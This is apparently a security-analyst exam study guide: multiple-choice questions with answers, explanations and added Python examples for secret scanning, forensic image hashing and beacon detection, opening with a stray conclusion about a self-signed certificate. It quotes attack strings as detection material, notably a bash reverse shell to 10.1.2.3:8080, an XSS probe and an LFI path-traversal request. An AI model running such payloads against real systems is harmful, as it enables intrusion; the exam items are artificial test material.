Conclusion: The most likely cause of the trust issue is option D, the self-signed digital certificate on the rebuilt web server. The fix is to reinstall the CA-issued certificate and key, and to make the certificate part of the server build or configuration management so that a rebuild cannot drop it again.
A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?
A. Interview the users who access these systems.
B. Scan the systems to see which vulnerabilities currently exist.
C. Configure alerts for vendor-specific zero-day exploits.
D. Determine the asset value of each system.
Correct Answer: D
Prioritizing systems based on their asset value is a crucial step in effective risk management and security planning. Let’s break down why this is the best approach:
Asset Valuation: Understanding the value of each system helps the security analyst assess its importance to the organization. Some systems may host critical data (e.g., customer records, financial information), while others may be less significant. By determining asset value, the analyst can allocate resources appropriately.
Risk Assessment: High-value assets are typically more attractive targets for attackers. By prioritizing them, the analyst can focus on protecting what matters most. This aligns with the organization’s overall risk management strategy.
Business Impact: The impact of a security incident on business operations depends on the affected system’s value. For example:
* A breach of a customer database could lead to reputational damage, legal consequences, and financial losses.
* An internal collaboration tool being compromised might have less severe consequences.
Compliance Requirements: Asset valuation also helps meet compliance requirements. Regulations often mandate protection of specific types of data (e.g., personal information, health records). Prioritizing high-value assets ensures compliance with relevant standards.
While interviewing users and scanning for vulnerabilities are essential tasks, determining asset value provides the foundational context for effective security decision-making. Once the analyst knows which systems are critical, they can proceed with vulnerability assessments, user interviews, and other risk management activities.
Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?
A. SLA
B. LOI
C. MOU
D. KPI
Correct Answer: A
The document that defines the expectation for network customers regarding patching during specific hours (between 2:00 a.m. and 4:00 a.m.) is typically an SLA (Service Level Agreement). SLAs outline the agreed-upon service levels, including maintenance windows, response times, and other performance metrics. It ensures alignment between service providers and customers.
A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application:
getConnection(database01,”alpha” ,”AxTv.127GdCx94GTd”);
Which of the following is the most likely vulnerability in this system?
A. Lack of input validation
B. SQL injection
C. Hard-coded credential
D. Buffer overflow
Correct Answer: C
The most likely vulnerability in this system is C. Hard-coded credential.
The presence of the hardcoded username (“alpha”) and password (“AxTv.127GdCx94GTd”) within the getConnection function call indicates that sensitive credentials are directly embedded in the code.
This practice poses a significant security risk, as anyone with access to the code can easily extract these credentials and potentially gain unauthorized access to the database.
To improve security, the credentials must be moved out of the code: read them at runtime from a secrets manager or vault, or from environment variables injected at deployment time, and keep them out of version control. The exposed password should be treated as compromised and rotated immediately, because anyone who has seen the binary or the repository already has it.
Additionally, regular code reviews and automated secret scanning in the build pipeline catch this class of defect before it ships.
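An added example (not from the page) in Python: a small pattern-based scanner that flags the getConnection call above and a second constructed hard-coded secret in source text, next to the hardened replacement that reads the database credentials from the environment and fails closed when they are absent. The regexes are assumptions tuned to the sample; real secret scanners use many more patterns plus entropy checks.

```python
import os
import re

# Constructed source lines. The first reproduces the call seen in the debugger output;
# the second is an invented API key; the last two are how it should look.
SOURCE = '''\
conn = getConnection(database01, "alpha", "AxTv.127GdCx94GTd");
api_key = "AKIAEXAMPLEKEY000001"
db_user = os.environ["DB_USER"]
password = getpass("Password: ")
'''

# Two common shapes of hard-coded secret: a credential-like variable assigned a string
# literal, and a connect/login call passing two quoted literals in a row (user, password).
PATTERNS = [
    ("credential_assignment", re.compile(
        r'\b(pass(word|wd)?|secret|token|api_?key)\s*=\s*["\'][^"\']{4,}["\']', re.I)),
    ("literal_login_args", re.compile(
        r'\b\w*(connect|connection|login|auth)\w*\s*\(.*["\'][^"\']+["\']\s*,\s*["\'][^"\']+["\']', re.I)),
]


def find_hardcoded_credentials(source):
    """Return (line_number, label, line) for every source line that matches a secret pattern."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        for label, rx in PATTERNS:
            if rx.search(line):
                hits.append((number, label, line.strip()))
                break
    return hits


def db_credentials_from_env(env=None):
    """Hardened replacement: credentials come from the environment (or a secrets manager), never the code.

    Fails closed: a missing variable raises instead of silently falling back to a default."""
    env = os.environ if env is None else env
    try:
        return env["DB_USER"], env["DB_PASSWORD"]
    except KeyError as missing:
        raise RuntimeError(f"database credential {missing} not provided") from None


def has_required_credentials(env):
    """Convenience check for deployment scripts: True only when both variables are set."""
    try:
        db_credentials_from_env(env)
        return True
    except RuntimeError:
        return False


if __name__ == "__main__":
    for number, label, line in find_hardcoded_credentials(SOURCE):
        print(f"line {number}: {label}: {line}")
    # The hardened path, with constructed values standing in for the real environment.
    user, _ = db_credentials_from_env({"DB_USER": "alpha", "DB_PASSWORD": "from-the-vault"})
    print("connecting as", user)
```

The scanner is the detection side of the finding; the hardened loader is the fix. Pair it with credential rotation, since a secret that has been in source is compromised no matter how it is loaded afterwards.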
An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Choose two).
A. Drop the tables on the database server to prevent data exfiltration.
B. Deploy EDR on the web server and the database server to reduce the adversary’s capabilities.
C. Stop the httpd service on the web server so that the adversary can not use web exploits.
D. Use microsegmentation to restrict connectivity to/from the web and database servers.
E. Comment out the HTTP account in the /etc/passwd file of the web server.
F. Move the database from the database server to the web server.
Correct Answer: B, D
Both Options B (EDR deployment) and D (microsegmentation) contain the adversary while maintaining the necessary functionality. These controls strike a balance between security and operational requirements.
Drop the tables on the database server to prevent data exfiltration (Option A): While this action would prevent data exfiltration, it could disrupt legitimate operations and potentially cause data loss. It’s not a recommended compensating control.
Deploy EDR (Endpoint Detection and Response) on the web server and the database server (Option B): EDR solutions monitor and respond to suspicious activities on endpoints. Deploying EDR can enhance threat detection and reduce the adversary’s capabilities. This is a good choice.
Stop the httpd service on the web server (Option C): Disabling the web server would indeed prevent the adversary from using web exploits. However, it would also render the web service inaccessible, which conflicts with the requirement to keep it running.
Use microsegmentation to restrict connectivity (Option D): Microsegmentation involves dividing the network into smaller segments and applying access controls. By restricting communication between the web and database servers, you can limit the adversary’s lateral movement. This is another effective control.
Comment out the HTTP account in the /etc/passwd file of the web server (Option E): Modifying the /etc/passwd file is not a recommended compensating control. It could lead to unintended consequences and may not effectively contain the adversary.
Move the database from the database server to the web server (Option F): Consolidating the database onto the web server is not advisable. It violates the principle of separation of concerns and could expose sensitive data to the internet.
An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?
A. Disable the user’s network account and access to web resources.
B. Make a copy of the files as a backup on the server.
C. Place a legal hold on the device and the user’s network share.
D. Make a forensic image of the device and create a SHA-1 hash.
Correct Answer: D
This approach ensures that a complete and exact copy of all the data on the device is made, which is essential for a forensic investigation. The hash of the image is compared with the hash of the original to prove that the image is an unaltered copy, and it can be recomputed later to show that the evidence has not changed since acquisition; this is what makes the evidence admissible in legal proceedings. The question specifies SHA-1, which is still widely recorded in forensic reports, but SHA-1 is no longer collision-resistant, so in practice record a SHA-256 digest alongside it. A legal hold (option C) is an important process step, but it does not by itself preserve the data on the device; the forensic image does.
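An added example serving this question and the earlier litigation-hold question (not code from the page): a Python acquisition routine that copies a source into an image, streams both through SHA-1 and SHA-256 in fixed-size chunks, records the digests in a custody record, and re-verifies the image later. The "device" is a constructed temporary file; on a real case the source is a block device behind a hardware write blocker and the copy is made with a forensic imager, which the shutil copy stands in for.

```python
import hashlib
import os
import shutil
import tempfile
from datetime import datetime, timezone

CHUNK = 1 << 20   # read 1 MiB at a time so multi-gigabyte images never sit in memory


def hash_file(path, algorithms=("sha1", "sha256")):
    """Stream the file once and return {algorithm: hexdigest} for every requested hash."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            for h in hashers.values():
                h.update(block)
    return {name: h.hexdigest() for name, h in hashers.items()}


def acquire_image(source, image_path):
    """Copy the source bit-for-bit to image_path, hash both, and return a custody record.

    On a real case `source` is a block device opened through a hardware write blocker and
    the copy is made by a forensic imager; shutil.copyfile stands in for that here."""
    shutil.copyfile(source, image_path)
    src_hashes = hash_file(source)
    img_hashes = hash_file(image_path)
    return {
        "acquired_at": datetime.now(timezone.utc).isoformat(),
        "source": source,
        "image": image_path,
        "sha1": img_hashes["sha1"],
        "sha256": img_hashes["sha256"],
        "verified": src_hashes == img_hashes,   # image matched the original at acquisition
    }


def still_intact(image_path, record):
    """Re-hash the image (before analysis, before handing it over) and compare to the record."""
    current = hash_file(image_path)
    return current["sha1"] == record["sha1"] and current["sha256"] == record["sha256"]


def demo():
    """Run on a constructed 'device' file; returns (record, intact_before, intact_after_tamper)."""
    workdir = tempfile.mkdtemp()
    try:
        device = os.path.join(workdir, "device.bin")
        image = os.path.join(workdir, "device.img")
        with open(device, "wb") as f:            # constructed evidence: ~3 MiB of random bytes
            f.write(os.urandom(3 * CHUNK + 17))
        record = acquire_image(device, image)
        intact_before = still_intact(image, record)
        with open(image, "r+b") as f:            # simulate a single flipped byte in the image
            f.seek(1234)
            original = f.read(1)
            f.seek(1234)
            f.write(bytes([original[0] ^ 0xFF]))
        intact_after = still_intact(image, record)
    finally:
        shutil.rmtree(workdir)
    return record, intact_before, intact_after


if __name__ == "__main__":
    rec, before, after = demo()
    print("acquisition verified:", rec["verified"])
    print("intact before tamper:", before, "| intact after tamper:", after)
```

Both digests are computed in the same pass, which is why recording SHA-256 next to the SHA-1 the question mentions costs nothing; the single flipped byte in the demo is enough to fail verification, which is exactly the property the court needs.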
A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?
A. Data exfiltration
B. Rogue device
C. Scanning
D. Beaconing
Correct Answer: D
Based on the information provided, the activity is beaconing. Beaconing is regular, periodic communication from a compromised internal host to an external server, typically a malware implant checking in with its command-and-control (C2) infrastructure for instructions; the consistent timing and the blocklisted destination are the tell-tale signs. Scanning (C) would involve probing many hosts or ports, data exfiltration (A) would show large outbound volumes rather than small repeated requests, and a rogue device (B) describes unauthorized hardware, not a traffic pattern.
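An added example (not from the page) of the detection logic in Python: group SIEM connection events by (source, destination), compute the gaps between successive connections, and flag pairs whose gaps have a low coefficient of variation, which is the signature of a fixed-period beacon. The events, hosts and blocklist are constructed; the thresholds are assumptions.

```python
from datetime import datetime
from statistics import mean, pstdev

# Constructed SIEM-style entries: (timestamp, source host, destination). Format is assumed.
EVENTS = [
    ("2024-03-10T09:00:00", "10.1.4.23", "203.0.113.50"),   # every ~5 minutes: beacon-like
    ("2024-03-10T09:05:02", "10.1.4.23", "203.0.113.50"),
    ("2024-03-10T09:09:58", "10.1.4.23", "203.0.113.50"),
    ("2024-03-10T09:15:01", "10.1.4.23", "203.0.113.50"),
    ("2024-03-10T09:20:00", "10.1.4.23", "203.0.113.50"),
    ("2024-03-10T09:24:59", "10.1.4.23", "203.0.113.50"),
    ("2024-03-10T09:01:12", "10.1.4.40", "198.51.100.9"),   # ordinary browsing: irregular gaps
    ("2024-03-10T09:01:15", "10.1.4.40", "198.51.100.9"),
    ("2024-03-10T09:14:40", "10.1.4.40", "198.51.100.9"),
    ("2024-03-10T09:15:03", "10.1.4.40", "198.51.100.9"),
    ("2024-03-10T10:02:30", "10.1.4.40", "198.51.100.9"),
    ("2024-03-10T10:02:31", "10.1.4.40", "198.51.100.9"),
]
BLOCKLIST = {"203.0.113.50"}   # constructed


def intervals(timestamps):
    """Seconds between consecutive events, in time order."""
    ts = sorted(datetime.fromisoformat(t) for t in timestamps)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def beacon_score(timestamps):
    """Coefficient of variation of the gaps: near 0 means a fixed period, i.e. beacon-like."""
    gaps = intervals(timestamps)
    if len(gaps) < 3:
        return None           # too few observations to judge regularity
    mu = mean(gaps)
    return pstdev(gaps) / mu if mu else None


def find_beacons(events, max_cv=0.2, min_events=4):
    """Group (src, dst) pairs, score their regularity, and report the candidates."""
    by_pair = {}
    for ts, src, dst in events:
        by_pair.setdefault((src, dst), []).append(ts)
    results = []
    for (src, dst), stamps in by_pair.items():
        if len(stamps) < min_events:
            continue
        cv = beacon_score(stamps)
        if cv is not None and cv <= max_cv:
            results.append({"src": src, "dst": dst, "count": len(stamps),
                            "period_s": round(mean(intervals(stamps))),
                            "cv": round(cv, 3), "blocklisted": dst in BLOCKLIST})
    return results


if __name__ == "__main__":
    for hit in find_beacons(EVENTS):
        print(hit)
```

Real implants add jitter to the interval, so raise max_cv or combine the regularity score with destination reputation and byte counts rather than treating one threshold as proof; the blocklisted destination in the question is what turns a regular pattern into a confident call.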
A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?
A. SIEM
B. XDR
C. SOAR
D. EDR
Correct Answer: C
Given the situation, SOAR would be the most effective choice for decreasing the workload without increasing staff. Let me explain why:
SIEM (Security Information and Event Management): SIEM systems collect and analyze security event data from various sources, but they don’t directly reduce workload. They are more focused on monitoring and alerting.
XDR (Extended Detection and Response): XDR solutions provide advanced threat detection and response capabilities, but they don’t inherently reduce workload. They might actually increase workload due to additional alerts and investigations.
SOAR (Security Orchestration, Automation, and Response): SOAR platforms automate repetitive security tasks, orchestrate incident response processes, and integrate with various security tools. By automating incident response workflows, SOAR can significantly reduce manual effort, streamline processes, and improve efficiency. It allows security analysts to focus on more complex tasks while routine actions are handled automatically.
EDR (Endpoint Detection and Response): EDR tools focus on detecting and responding to threats at the endpoint level. While they are essential for security, they don’t directly address workload reduction.
In summary, SOAR provides the best solution for managing increased workload efficiently by automating repetitive tasks and orchestrating incident response processes.
An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?
A. Insider threat
B. Ransomware group
C. Nation-state
D. Organized crime
Correct Answer: C
Given the context of seemingly unlimited time and resources, the threat actor most likely falls into the “Nation-state” category.
Nation-state actors are typically well-funded, highly skilled, and have extensive resources at their disposal. They engage in cyber espionage, political influence, and other strategic activities.
While other threat actors like ransomware groups and organized crime may also pose significant risks, the combination of unlimited resources and time aligns more closely with nation-state capabilities.
While reviewing web server logs, a security analyst found the following line:
< IMG SRC=’vbscript:msgbox(“test”)’ >
Which of the following malicious activities was attempted?
A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting
Correct Answer: D
The malicious activity attempted in this case is Cross-site scripting (XSS).
The line contains an image tag whose SRC attribute is a vbscript: URL rather than an image location. An attacker submits this kind of string to the application (in a form field or URL parameter, which is why it appears in the web server log) hoping the application will echo it back into a page unencoded, where a victim's browser would run the script and display the "test" message box.
Only legacy Internet Explorer ever executed vbscript: URLs; modern browsers ignore the pseudo-scheme. The attempt is nonetheless a recognizable XSS probe, and the follow-up is to confirm whether the application reflects or stores the input without output encoding.
XSS attacks allow an attacker to inject malicious scripts into web pages viewed by other users, potentially stealing their session cookies, compromising their data or executing unauthorized actions on their behalf.
A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?
A. config.ini
B. ntds.dit
C. Master boot record
D. Registry
Correct Answer: D
The correct answer is D. Registry. The Windows Registry contains configuration keys and values that control various aspects of the operating system and installed applications. It’s a centralized database where system settings, user preferences, and hardware configurations are stored.
A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://office365password.acme.co. The site’s standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?
A. This is a normal password change URL.
B. The security operations center is performing a routine password audit.
C. A new VPN gateway has been deployed.
D. A social engineering attack is underway.
Correct Answer: D
The URL https://office365password.acme.co does not match the company's standard VPN logon page www.acme.com/logon. The host sits on a look-alike domain (acme.co rather than acme.com) with a subdomain chosen to resemble a legitimate Office 365 password page, which is the pattern of a credential-harvesting site. Outbound traffic from inside the company to that host indicates that an employee has followed a phishing link, so a social engineering attack is underway. A normal password change (A) would use the company's own domain, a SOC audit (B) would not involve an external look-alike domain, and a new VPN gateway (C) would be announced and hosted under acme.com. The immediate steps are to block the domain, identify which internal host and user contacted it, and reset any credentials that may have been entered.
A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?
A. Operating system version
B. Registry key values
C. Open ports
D. IP address
Correct Answer: B
The scan described is an unauthenticated (non-credentialed) network scan from an appliance: the scanner was given subnets, not accounts. Such a scan can discover live hosts (IP address), enumerate open ports, and infer the operating system version from banners and fingerprinting, but it cannot read registry key values. Registry information is not exposed over the network; it requires a credentialed scan, in which the scanner logs on to each Windows host with an account that has the necessary rights, or an installed agent. That is also why credentialed scans find configuration weaknesses (missing patches, insecure settings) that a network-only scan misses.
A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?
A. /etc/shadow
B. curl localhost
C. ; printenv
D. cat /proc/self/
Correct Answer: A
Local File Inclusion (LFI) is a web vulnerability in which the application passes attacker-controlled input to a file-loading function, so the attacker can make the server read files from its own file system (for example /download?file=../../../../etc/passwd).
An attacker who exploits LFI to extract credentials goes after the files that hold them, and /etc/shadow, which stores users' password hashes on Linux and other Unix-like systems, is the classic target, so searching the web server logs for that string is the right pattern. Two practical caveats: the request may be URL-encoded (%2Fetc%2Fshadow) or use traversal tricks (....//, double encoding), so decode the request lines before searching and include /etc/passwd in the search; and /etc/shadow is readable only by root, so a successful read implies the web server was running with excessive privilege. The other options are patterns for different issues: curl localhost suggests server-side request forgery, ; printenv is a command injection probe, and cat /proc/self/ is likewise shell command syntax rather than a file path an LFI would include.
A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?
A. Leave the proxy as is.
B. Decomission the proxy.
C. Migrate the proxy to the cloud.
D. Patch the proxy.
Correct Answer: B
Proxy Not in Use: The proxy is racked but no longer serves any purpose, since it has been replaced. An unused, unpatched system that is still on the network is attack surface with no business value behind it.
High CVSS Score (9.8): The vulnerability carries a CVSS score of 9.8, which is in the Critical range; as long as the device is reachable, that is a critical exposure.
Security Best Practices: Patching (D) spends effort on an asset that has no purpose, and leaving it as is (A) or migrating it to the cloud (C) keeps the vulnerable system alive. Decommissioning removes the risk entirely: disconnect it from the network, wipe its configuration and any stored credentials, remove it from the asset inventory and monitoring, and dispose of it according to policy.
In summary, decommissioning the unused proxy is the most prudent course of action.
A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?
A. Non-credentialed scanning
B. Passive scanning
C. Agent-based scanning
D. Credentialed scanning
Correct Answer: B
Passive scanning is a method of vulnerability identification that does not send any packets or probes to the target devices, but rather observes and analyzes the network traffic passively. Passive scanning can minimize the risk of Operational Technology (OT)/Industrial Control Systems (ICS) devices malfunctioning due to the vulnerability identification process, as it does not interfere with the normal operation of the devices or cause any network disruption. Passive scanning can also detect vulnerabilities that active scanning may miss, such as misconfigured devices, rogue devices or unauthorized traffic.
An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?
A. Access rights
B. Network segmentation
C. Time synchronization
D. Invalid playbook
Correct Answer: C
Given the scenario, the most likely issue with the system is C. Time synchronization.
When events are logged across multiple systems, accurate timestamps are crucial for correlation.
If the system clocks are not synchronized, it can lead to discrepancies in event timelines, making it difficult to correlate data points effectively.
Ensuring consistent time synchronization across systems is essential for accurate analysis and incident response.
An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?
A. SOAR
B. SIEM
C. SLA
D. IoC
Correct Answer: A
SOAR (Security Orchestration, Automation, and Response): SOAR platforms are designed to streamline security operations by integrating various security tools, automating workflows, and orchestrating incident response processes. They allow analysts to create playbooks that automate repetitive tasks, including blocking malicious IP addresses. By collecting data from EDR agents, SOAR platforms can trigger automated actions, such as creating firewall rules to block the identified threat across the network.
SIEM (Security Information and Event Management): While SIEM systems are essential for collecting and analyzing security logs, they are primarily focused on monitoring and detection. SIEMs provide visibility into security events but do not directly automate actions like blocking IP addresses.
SLA (Service Level Agreement): SLAs define the expected level of service between parties (e.g., an organization and a vendor). They are not directly related to implementing security recommendations or automating threat response.
IoC (Indicator of Compromise): IoCs are specific artifacts (such as IP addresses, domains, hashes) associated with security threats. While IoCs are crucial for threat intelligence, they do not provide the automation capabilities needed to block malicious IP addresses.
Remember that SOAR platforms combine automation, orchestration, and incident response, making them the most suitable choice for implementing the analyst’s recommendation.
Which of the following describes the best reason for conducting a root cause analysis?
A. The root cause analysis ensures that proper timelines were documented.
B. The root cause analysis allows the incident to be properly documented for reporting.
C. The root cause analysis develops recommendations to improve the process.
D. The root cause analysis identifies the contributing items that facilitated the event.
Correct Answer: D
The root cause analysis identifies the contributing items that facilitated the event. It helps uncover the underlying factors that led to an incident, allowing organizations to address vulnerabilities and prevent similar events in the future.
By understanding the root cause, effective corrective actions can be taken to improve processes and prevent recurrence.
An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?
A. Any discovered vulnerabilities will not be remediated.
B. An outage of machinery would cost the organization money.
C. Support will not be available for the critical machinery.
D. There are no compensating controls in place for the OS.
Correct Answer: A
As an operating system reaches its end-of-life date, the vendor typically stops providing security updates and patches for known vulnerabilities.
This leaves systems running on the outdated OS exposed to potential security risks. Without the ability to receive patches, any vulnerabilities discovered in the OS after the end-of-life date will remain unaddressed, increasing the risk of exploitation by malicious actors. This concern highlights the importance of migrating critical systems to supported and up-to-date platforms to mitigate security risks.
While options B, C, and D may also be concerns for the organization, the primary focus of a security analyst is typically on mitigating security risks, making option A the best choice.
A security analyst identified the following suspicious entry on the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?
A. #!/bin/bash
nc 10.1.2.3 8080 -vv >dev/null && echo “Malicious activity” || echo “OK”
B. #!/bin/bash
ps -fea | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”
C. #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >dev/null && echo “Malicious activity” || echo “OK”
D. #!/bin/bash
netstat -antp | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”
Correct Answer: D
The suspicious entry bash -i >& /dev/tcp/10.1.2.3/8080 0>&1 appears to be an attempt to establish a reverse shell connection to the IP address 10.1.2.3 on port 8080.
Option A:
* This script uses nc (netcat) to connect to 10.1.2.3 on port 8080.
* If the connection is successful, it echoes “Malicious activity”; otherwise, it echoes “OK.”
* However, this script doesn’t directly verify the suspicious command.
* Not the best choice for confirming ongoing activity related to the suspicious entry.
Option B:
* This script uses ps -fea to list all processes and then pipes the output to grep 8080.
* If any process with port 8080 is found, it echoes “Malicious activity”; otherwise, it echoes “OK.”
* While it checks for processes, it doesn’t specifically validate the suspicious command.
* Not the most accurate choice for confirming ongoing activity related to the suspicious entry.
Option C:
* This script attempts to list the contents of a non-existent directory (/opt/tcp/10.1.2.3/8080).
* It will likely fail and always echo “OK.”
* Definitely not the right choice for confirming the suspicious activity.
Option D:
* This script uses netstat -antp to display active network connections.
* It then pipes the output to grep 8080 to check for any connections on port 8080.
* If a connection exists, it echoes “Malicious activity”; otherwise, it echoes “OK.”
* Best choice among the given options for confirming ongoing activity related to the suspicious entry.
Therefore, the security analyst should use Option D to accurately confirm whether the suspicious activity is ongoing. This script checks for active connections on port 8080, which aligns with the suspicious command.